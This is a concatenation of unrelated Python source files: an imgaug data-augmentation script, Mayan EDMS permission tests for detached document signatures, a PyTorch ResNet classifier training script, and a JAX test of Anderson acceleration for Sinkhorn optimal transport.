sometimes(iaa.Affine( # 部分图像做仿射变换
scale = {'x':(0.8,1.2),'y':(0.8,1.2)},# 图像缩放为80%到120%
translate_percent={'x':(-0.2,0.2),'y':(-0.2,0.2)},# 平移±20%
rotate=(-20,20),# 旋转±20度
shear=(-16,16),#剪切变换±16度(矩形变平行四边形)
cval=(0,255),# 全白全黑填充
# mode=ia.ALLL# 定义填充图像外区域的方法
)),
# 使用下面的0个到2个之间的方法增强图像
# iaa.SomeOf((0,2),
# [
# iaa.Sharpen(alpha=(0,0.3),lightness=(0.9,1.1)),#锐化处理
# # 加入高斯噪声
# iaa.AdditiveGaussianNoise(loc=0,scale=(0.0,0.05*255),per_channel=0.5),
# iaa.Add((-10,10),per_channel=0.5),# 每个像素随机加减-10到10之间的数
# iaa.Multiply((0.8,1.2),per_channel=0.5),# 像素乘上0.5或者1.5之间的数字
# # 将整个图像的对比度变为原来的一半或者二倍
# iaa.ContrastNormalization((0.5,2.0),per_channel=0.5),
# ],
# random_order=False)
],
random_order=True # 随机的顺序把这些操作用在图像上
)
try:
images_aug = seq.augment_images(images)# 应用数据增强
except:
continue
c = 1
for each in images_aug:
cv2.imencode('.jpg',each)[1].tofile(save_path + '\\%s%s.jpg'%(name, c))
# cv2.imencode('.jpg',each)[1].tofile('C:\\Users\\fg010\\Desktop\\%s%s.jpg'%(name, c), each)# 增强图片保存到指定路径
# cv2.imwrite('C:\\Users\\fg010\\Desktop\\荸荠\\%s%s.jpg'%(name, c), each)
c+=1
# ia.imshow(np.hstack(images_aug))# 显示增强图片
print('增强图片完成')
#%%
train_dir = './data/train'
i = 0
for dirname in os.listdir(train_dir): ## 获取当前路径下的所有文件夹及文件名。 dirname是0、1、2.。。。文件夹的名字。
path = train_dir + '\\' + dirname
print(path, i)
Data_Augmentation(path,path)
i += 1 |
<reponame>atitaya1412/Mayan-EDMS
from mayan.apps.django_gpg.permissions import permission_key_sign
from mayan.apps.django_gpg.tests.mixins import KeyTestMixin
from mayan.apps.documents.tests.base import GenericDocumentViewTestCase
from mayan.apps.documents.tests.literals import (
TEST_DOCUMENT_PATH, TEST_SMALL_DOCUMENT_PATH
)
from ..events import (
event_detached_signature_created, event_detached_signature_deleted,
event_detached_signature_uploaded
)
from ..models import DetachedSignature
from ..permissions import (
permission_document_file_sign_detached,
permission_document_file_signature_delete,
permission_document_file_signature_download,
permission_document_file_signature_upload,
permission_document_file_signature_view
)
from .mixins import (
DetachedSignatureViewTestMixin, DetachedSignatureTestMixin
)
class DetachedSignaturesViewTestCase(
KeyTestMixin, DetachedSignatureTestMixin, DetachedSignatureViewTestMixin,
GenericDocumentViewTestCase
):
auto_upload_test_document = False
def test_detached_signature_create_view_with_no_permission(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._create_test_key_private()
signature_count = self.test_document.file_latest.signatures.count()
self._clear_events()
response = self._request_test_document_file_signature_create_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
self.test_document.file_latest.signatures.count(),
signature_count
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_detached_signature_create_view_with_document_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._create_test_key_private()
signature_count = self.test_document.file_latest.signatures.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_sign_detached
)
self._clear_events()
response = self._request_test_document_file_signature_create_view()
self.assertEqual(response.status_code, 200)
self.assertEqual(
self.test_document.file_latest.signatures.count(),
signature_count
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_detached_signature_create_view_with_key_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._create_test_key_private()
signature_count = self.test_document.file_latest.signatures.count()
self.grant_access(
obj=self.test_key_private,
permission=permission_key_sign
)
self._clear_events()
response = self._request_test_document_file_signature_create_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
self.test_document.file_latest.signatures.count(),
signature_count
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_detached_signature_create_view_with_full_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._create_test_key_private()
signature_count = self.test_document.file_latest.signatures.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_sign_detached
)
self.grant_access(
obj=self.test_key_private,
permission=permission_key_sign
)
self._clear_events()
response = self._request_test_document_file_signature_create_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(
self.test_document.file_latest.signatures.count(),
signature_count + 1
)
events = self._get_test_events()
self.assertEqual(events.count(), 1)
self.assertEqual(
events[0].action_object,
self.test_document_file.signatures.first().detachedsignature
)
self.assertEqual(events[0].actor, self._test_case_user)
self.assertEqual(events[0].target, self.test_document_file)
self.assertEqual(events[0].verb, event_detached_signature_created.id)
def test_trashed_document_detached_signature_create_view_with_full_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._create_test_key_private()
signature_count = self.test_document.file_latest.signatures.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_sign_detached
)
self.grant_access(
obj=self.test_key_private,
permission=permission_key_sign
)
self.test_document.delete()
self._clear_events()
response = self._request_test_document_file_signature_create_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
self.test_document.file_latest.signatures.count(),
signature_count
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_detached_signature_delete_view_no_permission(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
signature_count = DetachedSignature.objects.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_view
)
self._clear_events()
response = self._request_test_document_file_signature_detached_delete_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(DetachedSignature.objects.count(), signature_count)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_detached_signature_delete_view_with_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
signature_count = DetachedSignature.objects.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_delete
)
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_view
)
self._clear_events()
response = self._request_test_document_file_signature_detached_delete_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(
DetachedSignature.objects.count(), signature_count - 1
)
events = self._get_test_events()
self.assertEqual(events.count(), 1)
self.assertEqual(events[0].action_object, None)
self.assertEqual(events[0].actor, self.test_document_file)
self.assertEqual(events[0].target, self.test_document_file)
self.assertEqual(events[0].verb, event_detached_signature_deleted.id)
def test_trashed_document_signature_delete_view_with_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
signature_count = DetachedSignature.objects.count()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_delete
)
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_view
)
self.test_document.delete()
self._clear_events()
response = self._request_test_document_file_signature_detached_delete_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(
DetachedSignature.objects.count(), signature_count
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_signature_download_view_no_permission(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
self._clear_events()
response = self._request_test_document_file_signature_detached_download_view()
self.assertEqual(response.status_code, 404)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_signature_download_view_with_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_download
)
self.expected_content_types = ('application/octet-stream',)
self._clear_events()
response = self._request_test_document_file_signature_detached_download_view()
with self.test_signature.signature_file as file_object:
self.assert_download_response(
response=response, content=file_object.read(),
)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_trashed_document_signature_download_view_with_access(self):
self.test_document_path = TEST_SMALL_DOCUMENT_PATH
self._upload_test_document()
self._upload_test_detached_signature()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_download
)
self.test_document.delete()
self._clear_events()
response = self._request_test_document_file_signature_detached_download_view()
self.assertEqual(response.status_code, 404)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_signature_upload_view_no_permission(self):
self.test_document_path = TEST_DOCUMENT_PATH
signature_count = DetachedSignature.objects.count()
self._upload_test_document()
self._clear_events()
response = self._request_test_document_file_signature_detached_upload_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(DetachedSignature.objects.count(), signature_count)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
def test_signature_upload_view_with_access(self):
self.test_document_path = TEST_DOCUMENT_PATH
self._upload_test_document()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_upload
)
signature_count = DetachedSignature.objects.count()
self._clear_events()
response = self._request_test_document_file_signature_detached_upload_view()
self.assertEqual(response.status_code, 302)
self.assertEqual(
DetachedSignature.objects.count(), signature_count + 1
)
events = self._get_test_events()
self.assertEqual(events.count(), 1)
self.assertEqual(
events[0].action_object,
self.test_document.file_latest.signatures.first().detachedsignature
)
self.assertEqual(events[0].actor, self._test_case_user)
self.assertEqual(events[0].target, self.test_document_file)
self.assertEqual(events[0].verb, event_detached_signature_uploaded.id)
def test_trashed_document_signature_upload_view_with_access(self):
self.test_document_path = TEST_DOCUMENT_PATH
self._upload_test_document()
self.grant_access(
obj=self.test_document,
permission=permission_document_file_signature_upload
)
self.test_document.delete()
signature_count = DetachedSignature.objects.count()
self._clear_events()
response = self._request_test_document_file_signature_detached_upload_view()
self.assertEqual(response.status_code, 404)
self.assertEqual(DetachedSignature.objects.count(), signature_count)
events = self._get_test_events()
self.assertEqual(events.count(), 0)
|
# -*- coding: utf-8 -*-
import argparse
import time
from model import resnet
from model.dpn import dpn92
import torch
import torch.backends.cudnn as cudnn
import torchvision
from torchvision import transforms
import torch.nn as nn
from torch.autograd import Variable
from model.utils import load_filtered_state_dict, SaveBestModel, AverageMeter, accuracy
from data_wrapper import get_dataset, DataWrapper
from tensorboardX import SummaryWriter
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Head pose estimation using the Hopenet network.')
parser.add_argument('--gpu', dest='gpu', help='GPU device id to use', nargs='+',
default=[0, 1], type=int)
parser.add_argument('--num_epochs', dest='num_epochs', help='Maximum number of training epochs.',
default=100, type=int)
parser.add_argument('--batch_size', dest='batch_size', help='Batch size.',
default=64, type=int)
parser.add_argument('--lr', dest='lr', help='Base learning rate.',
default=0.1, type=float)
parser.add_argument('--trainning_data_dir', dest='trainning_data_dir', help='Directory path for trainning data.',
default='./data/train', type=str)
parser.add_argument('--validation_data_dir', dest='validation_data_dir', help='Directory path for validation data.',
default='./data/test', type=str)
parser.add_argument('--save_path', dest='save_path', help='Path of model snapshot for save.',
default='./models', type=str)
parser.add_argument('--saved_model', help='Path of model snapshot for continue training.',
default='./models/resnet50-19c8e357.pth', type=str)
args = parser.parse_args()
return args
def evaluate(eval_loader, model, writer, step, Save_model, epoch):
top_prec = AverageMeter()
softmax = nn.Softmax().cuda()
for i, (images, labels, names) in enumerate(eval_loader):
images = Variable(images).cuda()
labels = Variable(labels).cuda()
label_pred = model(images)
label_pred = softmax(label_pred)
prec = accuracy(label_pred, labels, topk=(1,))
top_prec.update(prec[0].item())
print('evaluate * Prec@1 {top:.3f}'.format(top=top_prec.avg))
writer.add_scalar('eval_prec', top_prec.avg, step)
Save_model.save(model, top_prec.avg, epoch)
def train(train_loader, model, criterion, optimizer, writer, batch_size, epoch, step, n):
last_time = time.time()
for param_group in optimizer.param_groups:
lr = param_group['lr']
writer.add_scalar('learning_rate', lr, step)
break
for i, (images, labels, name) in enumerate(train_loader):
images = Variable(images).cuda()
labels = Variable(labels).cuda()
label_pred = model(images)
# Cross entropy loss
loss = criterion(label_pred, labels)
writer.add_scalar('loss', loss, step)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i % 10 == 0:
curr_time = time.time()
sps = 10.0 / (curr_time - last_time) * batch_size
print("Epoch [{}], Iter [{}/{}] {} samples/sec, Losses: {}".format(epoch+1,
i+1, n//batch_size, sps, loss.item()))
last_time = curr_time
step += 1
# evaluate
softmax = nn.Softmax().cuda()
label_pred = softmax(label_pred)
prec = accuracy(label_pred, labels, topk=(1,))
print('training * Prec@1 {top:.3f}'.format(top=prec[0].item()))
writer.add_scalar('training_prec', prec[0].item(), step)
return step
def main(args):
cudnn.enabled = True
print('Loading data.')
transformations = transforms.Compose([transforms.Resize(320),
transforms.RandomCrop(299), transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])
train_x, train_y, classes_names = get_dataset(args.trainning_data_dir)
test_x, test_y, _ = get_dataset(args.validation_data_dir)
num_classes = len(classes_names)
print("classes : {}".format(classes_names))
trainning_dataset = DataWrapper(train_x, train_y, transformations)
eval_dataset = DataWrapper(test_x, test_y, transformations)
train_loader = torch.utils.data.DataLoader(dataset=trainning_dataset,
batch_size=args.batch_size,
shuffle=True,
num_workers=16)
eval_loader = torch.utils.data.DataLoader(dataset=eval_dataset,
batch_size=args.batch_size,
shuffle=True,
num_workers=16)
n = trainning_dataset.__len__()
print(n)
# ResNet50 structure
model = resnet.ResNet(torchvision.models.resnet.Bottleneck, [3, 4, 6, 3], num_classes)
# dpn 92
#model = dpn92(num_classes=num_classes)
if args.saved_model:
print('Loading model.')
saved_state_dict = torch.load(args.saved_model)
# 'origin model from pytorch'
if 'resnet' in args.saved_model:
load_filtered_state_dict(model, saved_state_dict, ignore_layer=[], reverse=False)
else:
load_filtered_state_dict(model, saved_state_dict, ignore_layer=[], reverse=True)
crossEntropyLoss = nn.CrossEntropyLoss().cuda()
#optimizer = torch.optim.Adam(model.parameters(), lr = args.lr )
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.9)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[20, 40, 60], gamma=0.1)
# multi-gpu
model = nn.DataParallel(model, device_ids=args.gpu)
model.cuda()
Save_model = SaveBestModel(save_dir=args.save_path)
Writer = SummaryWriter()
step = 0
for epoch in range(args.num_epochs):
scheduler.step()
evaluate(eval_loader, model, Writer, step, Save_model, epoch)
step = train(train_loader, model, crossEntropyLoss, optimizer, Writer, args.batch_size, epoch, step, n)
if __name__ == '__main__':
args = parse_args()
main(args)
|
# coding=utf-8
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests Anderson acceleration for sinkhorn."""
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
import jax.test_util
from ott.core import sinkhorn
from ott.geometry import pointcloud
class SinkhornAndersonTest(jax.test_util.JaxTestCase):
"""Tests for Anderson acceleration."""
def setUp(self):
super().setUp()
self.rng = jax.random.PRNGKey(0)
@parameterized.product(
lse_mode=[True, False],
tau_a=[1.0, .98],
tau_b=[1.0, .985],
shape=[(237, 153)],
refresh_anderson_frequency=[1, 3]
)
def test_anderson(self, lse_mode, tau_a,
tau_b, shape, refresh_anderson_frequency):
"""Test efficiency of Anderson acceleration.
Args:
lse_mode: whether to run in lse (True) or kernel (false) mode.
tau_a: unbalanced parameter w.r.t. 1st marginal
tau_b: unbalanced parameter w.r.t. 1st marginal
shape: shape of test problem
refresh_anderson_frequency: how often to Anderson interpolation should be
recomputed.
"""
n, m = shape
dim = 4
rngs = jax.random.split(self.rng, 9)
x = jax.random.uniform(rngs[0], (n, dim)) / dim
y = jax.random.uniform(rngs[1], (m, dim)) / dim + .2
a = jax.random.uniform(rngs[2], (n,))
b = jax.random.uniform(rngs[3], (m,))
a = a.at[0].set(0)
b = b.at[3].set(0)
# Make weights roughly sum to 1 if unbalanced, normalize else.
a = a / (0.5 * n) if tau_a < 1.0 else a / jnp.sum(a)
b = b / (0.5 * m) if tau_b < 1.0 else b / jnp.sum(b)
# Here epsilon must be small enough to valide gain in performance using
# Anderson by large enough number of saved iterations,
# but large enough when lse_mode=False to avoid underflow.
epsilon = 5e-4 if lse_mode else 5e-3
threshold = 1e-3
iterations_anderson = []
anderson_memory = [0, 5]
for anderson_acceleration in anderson_memory:
out = sinkhorn.sinkhorn(
pointcloud.PointCloud(x, y, epsilon=epsilon),
a=a,
b=b,
tau_a=tau_a,
tau_b=tau_b,
lse_mode=lse_mode,
threshold=threshold,
anderson_acceleration=anderson_acceleration,
refresh_anderson_frequency=refresh_anderson_frequency)
errors = out.errors
clean_errors = errors[errors > -1]
# Check convergence
self.assertGreater(threshold, clean_errors[-1])
# Record number of inner_iterations needed to converge.
iterations_anderson.append(jnp.size(clean_errors))
# Check Anderson acceleration speeds up execution when compared to none.
for i in range(1, len(anderson_memory)):
self.assertGreater(iterations_anderson[0], iterations_anderson[i])
if __name__ == '__main__':
absltest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.